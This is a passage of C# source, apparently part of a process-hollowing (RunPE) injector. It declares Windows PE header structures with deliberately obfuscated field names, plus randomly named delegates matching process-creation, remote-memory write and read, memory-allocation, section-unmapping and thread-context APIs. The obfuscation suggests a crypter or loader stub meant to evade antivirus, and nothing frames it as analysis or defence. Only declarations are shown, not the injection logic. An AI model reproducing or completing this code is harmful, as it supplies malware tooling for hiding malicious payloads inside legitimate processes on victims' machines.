|
public ushort DASFASE33;
|
|||
|
public ushort DASKGHJ;
|
|||
|
public ushort DASVZDF;
|
|||
|
public ushort VXCVXC;
|
|||
|
public ushort VXCVXCV;
|
|||
|
public ushort EWECS;
|
|||
|
public ushort EWADC;
|
|||
|
public ushort UADA3;
|
|||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
|
|||
|
public ushort[] ReservWWWWWWWWWWWWWWWedA;
|
|||
|
public ushort DAS4E;
|
|||
|
public ushort UJJ;
|
|||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
|
|||
|
public ushort[] DDDDDDDDD;
|
|||
|
public int DASE3ASDAS;
|
|||
|
}
|
|||
|
|
|||
|
public struct NT_Headers
|
|||
|
{
|
|||
|
public uint SSSSSSSSSSSQ;
|
|||
|
public buffy.File_Header DSEEEEE;
|
|||
|
public buffy.Optional_Headers OOOU;
|
|||
|
}
|
|||
|
|
|||
|
public struct File_Header
|
|||
|
{
|
|||
|
public ushort ITTTTTTTT;
|
|||
|
public ushort DAAAAAAAA3;
|
|||
|
public uint HRFTYTYTR;
|
|||
|
public uint GJGFSFS;
|
|||
|
public uint FSVGY;
|
|||
|
public ushort FSFV;
|
|||
|
public ushort A34FFC;
|
|||
|
}
|
|||
|
|
|||
|
public struct Optional_Headers
|
|||
|
{
|
|||
|
public ushort WWWWWWWWW;
|
|||
|
public byte MaAAAAAAAAAAAjor;
|
|||
|
public byte MiSSSSSSSSSSSnor;
|
|||
|
public uint SSSSSSSSSSSSS;
|
|||
|
public uint FFFFFFFFFFF;
|
|||
|
public uint XXXXXXXX;
|
|||
|
public uint DDDDDDDDAAA;
|
|||
|
public uint FSSSSSSS;
|
|||
|
public uint RSFS43;
|
|||
|
public uint DFAZDASD;
|
|||
|
public uint SectionA;
|
|||
|
public uint FileA;
|
|||
|
public ushort GDFTDFFFF;
|
|||
|
public ushort HGDFHD564;
|
|||
|
public ushort GD5ERGD;
|
|||
|
public ushort FSD5YHD;
|
|||
|
public ushort ASDASG;
|
|||
|
public ushort AS4ASAS;
|
|||
|
public uint CCC;
|
|||
|
public uint DASRDASRASR;
|
|||
|
public uint WQDASDASD;
|
|||
|
public uint Assssssss;
|
|||
|
public ushort fsd4s;
|
|||
|
public ushort fjio;
|
|||
|
public uint dasrlajstpoi;
|
|||
|
public uint dasdraskyjhuasp;
|
|||
|
public uint SHRedas4wa9uqserve;
|
|||
|
public uint fsdtsysyt;
|
|||
|
public uint eawdasdas3;
|
|||
|
public uint Cocccunt;
|
|||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
|
|||
|
public buffy.Data_Directory[] GSDGSDT4;
|
|||
|
}
|
|||
|
|
|||
|
public struct Data_Directory
|
|||
|
{
|
|||
|
public uint ewq34q234;
|
|||
|
public uint das34aw33;
|
|||
|
}
|
|||
|
|
|||
|
public delegate bool GN04L0ER8I(
|
|||
|
string ASFASE3,
|
|||
|
string DASDAS3E2,
|
|||
|
ref buffy.Security_Flags DASCASE,
|
|||
|
ref buffy.Security_Flags CASE222,
|
|||
|
bool DAS432E,
|
|||
|
uint AEDFKJK32,
|
|||
|
IntPtr DSA43R3W,
|
|||
|
string ase32ew,
|
|||
|
[In] ref buffy.Startup_Information das43fsa,
|
|||
|
out buffy.Process_Information das3);
|
|||
|
|
|||
|
public delegate bool ZGOQ8VM05M(
|
|||
|
IntPtr DASE32,
|
|||
|
int AL8ZCRFWNU,
|
|||
|
byte[] DSAE32,
|
|||
|
int DASEADAS,
|
|||
|
out int ASD43FA);
|
|||
|
|
|||
|
public delegate int Q7QRRP639W(
|
|||
|
IntPtr FASFDASDAS,
|
|||
|
int AL8ZCRFWNU,
|
|||
|
ref int CAS32,
|
|||
|
int ASDASC,
|
|||
|
ref int CASTWE);
|
|||
|
|
|||
|
public delegate IntPtr W6CTR6GLCC(
|
|||
|
IntPtr DASE43E,
|
|||
|
int AL8ZCRFWNU,
|
|||
|
uint DASCAS3,
|
|||
|
uint DAS3,
|
|||
|
uint DAS32);
|
|||
|
|
|||
|
public delegate long EFVI2YI66B(IntPtr DASE3, int AL8ZCRFWNU);
|
|||
|
|
|||
|
public delegate uint WS2XVBNVO9(IntPtr DASEAS);
|
|||
|
|
|||
|
public delegate bool R84OY4NT36(IntPtr DASDASC, ref buffy.Context DSACSA43);
|
|||
|
|
|||
|
public delegate bool K7B3INYH01(IntPtr ASDASCASDASD, ref buffy.Context ASCA434);
|
|||
|
}
|